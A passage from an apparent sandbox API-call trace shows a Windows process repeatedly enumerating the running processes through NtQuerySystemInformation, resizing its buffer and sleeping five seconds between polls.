returned 0x0 [0240.326] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.327] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.328] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.328] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.328] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.333] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.335] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.336] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.336] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.338] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.338] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.338] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.354] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.355] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.357] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.357] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.358] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.358] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.358] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.362] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.363] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.365] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.365] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.367] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.367] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.367] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.371] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.372] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.374] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.374] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.375] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.375] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.375] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.380] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.381] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.383] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.383] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.384] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.384] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.384] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.388] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.389] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.391] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.391] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.392] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.392] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.392] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.397] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.398] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.399] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.399] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.400] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.400] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.400] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.405] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.405] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.407] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.407] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.408] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.409] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.409] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.414] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.414] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.416] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.417] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.417] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.418] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.418] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.422] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.423] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.425] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.425] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.426] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.426] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.426] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.431] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.432] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.434] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.434] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.435] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.435] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.436] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.439] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.440] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.441] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.442] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.442] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.443] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.443] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.447] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.448] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.450] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.450] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.451] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.451] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.451] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.455] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.455] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.457] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.457] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.458] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.459] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.459] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.463] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.464] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.466] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.467] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.468] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.468] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.468] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.474] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.475] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.479] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.479] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.480] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.481] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.481] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.486] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.486] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.488] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.489] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.490] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.490] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.490] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.495] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.496] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.498] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.498] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.499] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.499] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.500] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.504] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.505] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.507] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.508] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.509] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.509] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.509] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.514] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.515] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.516] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.516] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.517] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.518] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.518] NtQuerySystemInformation (in: 